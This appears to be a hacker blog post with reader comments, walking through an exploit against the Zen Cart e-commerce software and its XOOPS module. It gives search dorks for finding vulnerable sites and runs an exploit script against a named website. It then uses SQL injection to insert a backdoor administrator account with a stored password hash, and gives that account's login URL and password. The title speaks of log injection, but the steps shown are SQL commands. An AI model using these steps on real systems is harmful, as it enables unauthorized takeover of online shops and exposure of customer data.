LFI to RCE via access_log injection

XOOPS Module Zen Cart

this an old bug from BlackH >> http://milw0rm.com/exploits/9005
works for Zen Cart version 1.3.8 but its works on XOOPS Zen Cart module too
lets go.. :p

google dork

"powered by xoops" inurl:"modules/zox"
"powered by xoops" "zen cart"

run the exploit from ur shell

root@evilc0de:/home/noge# ./zen.py -url http://www.a-akinai.com/modules/zox
sql@jah$

now try with show tables; command, if it success then we can exploit the target

sql@jah$ show tables;
>> success ( show tables; )

command execute successfully.. but u cant see the table list right?
lets add admin user to database with this sql command..

sql@jah$ INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (55, 'giant', 'admin@localhost', '617ec22fbb8f201c366e9848c0eb6925:87');
>> success ( INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (55, 'giant', 'admin@localhost', '617ec22fbb8f201c366e9848c0eb6925:87'); )

admin added successfully.. now try login to admin panel..

http://www.a-akinai.com/modules/zox/admin/login.php
username : giant
password : wew



Comments

Anonymous said…
nice info..
labatterie said…
The admin added successfully.. now try login to admin panel..
Golden Root said…
Great Blog, some really useful info